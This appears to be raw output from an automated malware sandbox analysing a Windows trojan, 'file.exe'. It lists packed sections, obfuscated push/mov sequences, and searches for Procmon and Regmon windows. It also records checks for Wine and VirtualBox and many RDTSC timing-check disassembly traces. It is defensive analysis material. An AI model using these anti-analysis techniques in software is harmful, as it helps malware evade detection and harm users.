    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005510000_2_00551000
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005620300_2_00562030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0059A0D00_2_0059A0D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005551600_2_00555160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005571F00_2_005571F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C40_2_007251C4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055E1A00_2_0055E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071B2130_2_0071B213
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071820E0_2_0071820E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005882D00_2_005882D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005812D00_2_005812D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005512F70_2_005512F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055A3000_2_0055A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005823E00_2_005823E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055B3A00_2_0055B3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005513A30_2_005513A3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057C4700_2_0057C470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005864F00_2_005864F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056049B0_2_0056049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005644870_2_00564487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056C5F00_2_0056C5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E5B10_2_0068E5B1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005535B00_2_005535B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005986520_2_00598652
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055164F0_2_0055164F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005986F00_2_005986F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071E76B0_2_0071E76B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F37B20_2_006F37B2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005818600_2_00581860
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058B8C00_2_0058B8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0058E8A00_2_0058E8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C197A0_2_006C197A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006BC95F0_2_006BC95F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057098B0_2_0057098B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005989A00_2_005989A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00594A400_2_00594A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00651A5C0_2_00651A5C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00598A800_2_00598A80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00597AB00_2_00597AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005BCAAB0_2_005BCAAB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056DB6F0_2_0056DB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00632B370_2_00632B37
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00557BF00_2_00557BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00598C020_2_00598C02
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057CCD00_2_0057CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00596CBF0_2_00596CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00722D660_2_00722D66
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00578D620_2_00578D62
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057FD100_2_0057FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0071CD190_2_0071CD19
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057DD290_2_0057DD29
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0057AE570_2_0057AE57
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00598E700_2_00598E70
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00564E2A0_2_00564E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055BEB00_2_0055BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00566EBF0_2_00566EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055AF100_2_0055AF10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00558FD00_2_00558FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00597FC00_2_00597FC0
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0055CAA0 appears 48 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 0056D300 appears 152 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9994520936468647
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@10/2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00588220 CoCreateInstance,0_2_00588220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 2905088 > 1048576
    Source: file.exeStatic PE information: Raw size of qvddldgl is bigger than: 0x100000 < 0x29be00

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.550000.0.unpack :EW;.rsrc :W;.idata :W;qvddldgl:EW;dpjuhttd:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;qvddldgl:EW;dpjuhttd:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x2d4613 should be: 0x2c61dd
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name: qvddldgl
    Source: file.exeStatic PE information: section name: dpjuhttd
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C000 push ecx; mov dword ptr [esp], 106DAD21h0_2_0084C02D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C000 push ebp; mov dword ptr [esp], edx0_2_0084C038
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C000 push ebp; mov dword ptr [esp], esi0_2_0084C16D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007380E0 push 5706F4F1h; mov dword ptr [esp], edx0_2_00738130
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007FF0EA push ecx; mov dword ptr [esp], eax0_2_007FF1B6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C04B push ebp; mov dword ptr [esp], esi0_2_0084C16D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C1AF push edi; mov dword ptr [esp], 5B01E677h0_2_0084C1BF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0084C1AF push esi; mov dword ptr [esp], 79711C00h0_2_0084C1E5
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00786132 push 7496B363h; mov dword ptr [esp], edx0_2_00786176
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00786132 push ebx; mov dword ptr [esp], edi0_2_007861A6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008001DD push 76C6F48Bh; mov dword ptr [esp], ebp0_2_008001EE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push esi; mov dword ptr [esp], ebp0_2_0072521A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 750F640Eh; mov dword ptr [esp], ebp0_2_007252B1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 72635506h; mov dword ptr [esp], eax0_2_007252DE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 7EC77604h; mov dword ptr [esp], eax0_2_00725480
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 7CF281D2h; mov dword ptr [esp], ecx0_2_00725488
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 124ED0A0h; mov dword ptr [esp], edi0_2_007254D7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push esi; mov dword ptr [esp], eax0_2_0072557E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 0809D7D8h; mov dword ptr [esp], edx0_2_00725586
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push eax; mov dword ptr [esp], 22A24D00h0_2_007255B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 65E147C3h; mov dword ptr [esp], esi0_2_007255F3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push ebp; mov dword ptr [esp], edx0_2_0072564B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push eax; mov dword ptr [esp], edx0_2_00725702
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push ecx; mov dword ptr [esp], edi0_2_007257B2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push ecx; mov dword ptr [esp], edx0_2_007257B8
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push edx; mov dword ptr [esp], edi0_2_00725802
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 0D1B1E54h; mov dword ptr [esp], ebp0_2_00725895
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 3B1027ABh; mov dword ptr [esp], edx0_2_007258A6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push edi; mov dword ptr [esp], 0243ABA4h0_2_007258F4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 16697DA3h; mov dword ptr [esp], eax0_2_00725938
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007251C4 push 5FE8B8E6h; mov dword ptr [esp], eax0_2_007259C5
    Source: file.exeStatic PE information: section name: entropy: 7.97591323533163

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B3EF7 second address: 5B3EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AD01 second address: 72AD43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF7A0B38036h 0x00000008 jmp 00007FF7A0B38035h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 je 00007FF7A0B38026h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AD43 second address: 72AD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729DF8 second address: 729E0C instructions: 0x00000000 rdtsc 0x00000002 je 00007FF7A0B38026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push edx 0x0000000c jl 00007FF7A0B3802Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729F5B second address: 729F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 729F5F second address: 729F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A21D second address: 72A242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF7A105DEAFh 0x0000000e jmp 00007FF7A105DEADh 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A384 second address: 72A388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A388 second address: 72A38C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A38C second address: 72A398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF7A0B38026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A398 second address: 72A39D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A39D second address: 72A3A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A3A6 second address: 72A3C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF7A105DEB7h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A3C1 second address: 72A3C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A3C7 second address: 72A3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A3D4 second address: 72A3D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A526 second address: 72A53E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF7A105DEAFh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A53E second address: 72A544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A544 second address: 72A54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A54D second address: 72A551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A551 second address: 72A562 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FF7A105DEA6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A562 second address: 72A598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007FF7A0B38039h 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 jmp 00007FF7A0B3802Fh 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72A598 second address: 72A5A8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF7A105DEA6h 0x00000008 jnc 00007FF7A105DEA6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D2A4 second address: 72D2AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D2AC second address: 72D2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF7A105DEB3h 0x0000000d pop edx 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D2D8 second address: 72D319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jmp 00007FF7A0B38034h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007FF7A0B38035h 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D319 second address: 72D31F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D31F second address: 72D325 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D325 second address: 5B3EF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+122D3CEFh] 0x0000000f push dword ptr [ebp+122D0D21h] 0x00000015 mov ecx, dword ptr [ebp+122D3D97h] 0x0000001b call dword ptr [ebp+122D24CFh] 0x00000021 pushad 0x00000022 jmp 00007FF7A105DEB4h 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a adc esi, 6AE61E96h 0x00000030 mov edi, dword ptr [ebp+122D3C8Fh] 0x00000036 popad 0x00000037 mov edx, dword ptr [esp+28h] 0x0000003b pushad 0x0000003c mov ecx, dword ptr [ebp+122D3C7Fh] 0x00000042 jmp 00007FF7A105DEAEh 0x00000047 popad 0x00000048 pushad 0x00000049 movsx ecx, dx 0x0000004c popad 0x0000004d mov dword ptr [ebp+122D3B33h], eax 0x00000053 mov dword ptr [ebp+122D1D1Dh], edx 0x00000059 mov esi, 0000003Ch 0x0000005e stc 0x0000005f add esi, dword ptr [esp+24h] 0x00000063 jng 00007FF7A105DEACh 0x00000069 sub dword ptr [ebp+122D1D1Dh], eax 0x0000006f lodsw 0x00000071 pushad 0x00000072 mov dh, 17h 0x00000074 mov esi, dword ptr [ebp+122D3D3Fh] 0x0000007a popad 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f jmp 00007FF7A105DEB1h 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jmp 00007FF7A105DEB6h 0x0000008d push eax 0x0000008e push eax 0x0000008f push edx 0x00000090 jnp 00007FF7A105DEBAh 0x00000096 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D351 second address: 72D385 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D2AB6h], ebx 0x0000000f push 00000000h 0x00000011 sub dword ptr [ebp+1244CCA7h], edx 0x00000017 jng 00007FF7A0B3802Eh 0x0000001d push 108126DAh 0x00000022 push eax 0x00000023 push edx 0x00000024 push esi 0x00000025 jne 00007FF7A0B38026h 0x0000002b pop esi 0x0000002c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D385 second address: 72D410 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 1081265Ah 0x0000000f movzx esi, si 0x00000012 push 00000003h 0x00000014 and ecx, dword ptr [ebp+122D3C53h] 0x0000001a push 00000000h 0x0000001c or dword ptr [ebp+122D1CFBh], eax 0x00000022 push 00000003h 0x00000024 mov esi, dword ptr [ebp+122D3BFBh] 0x0000002a call 00007FF7A105DEA9h 0x0000002f jmp 00007FF7A105DEB2h 0x00000034 push eax 0x00000035 push edx 0x00000036 push edi 0x00000037 jng 00007FF7A105DEA6h 0x0000003d pop edi 0x0000003e pop edx 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 js 00007FF7A105DEB7h 0x00000049 jmp 00007FF7A105DEB1h 0x0000004e mov eax, dword ptr [eax] 0x00000050 jnl 00007FF7A105DEB4h 0x00000056 mov dword ptr [esp+04h], eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push ecx 0x0000005f pop ecx 0x00000060 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D410 second address: 72D416 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D416 second address: 72D425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF7A105DEABh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D4B3 second address: 72D4BD instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF7A0B38026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D4BD second address: 72D4C2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D610 second address: 72D620 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF7A0B38026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D620 second address: 72D625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72D625 second address: 72D65F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF7A0B38028h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007FF7A0B38030h 0x00000010 push 00000000h 0x00000012 mov esi, dword ptr [ebp+122D3BABh] 0x00000018 push 92AD7648h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF7A0B3802Eh 0x00000024 rdtsc
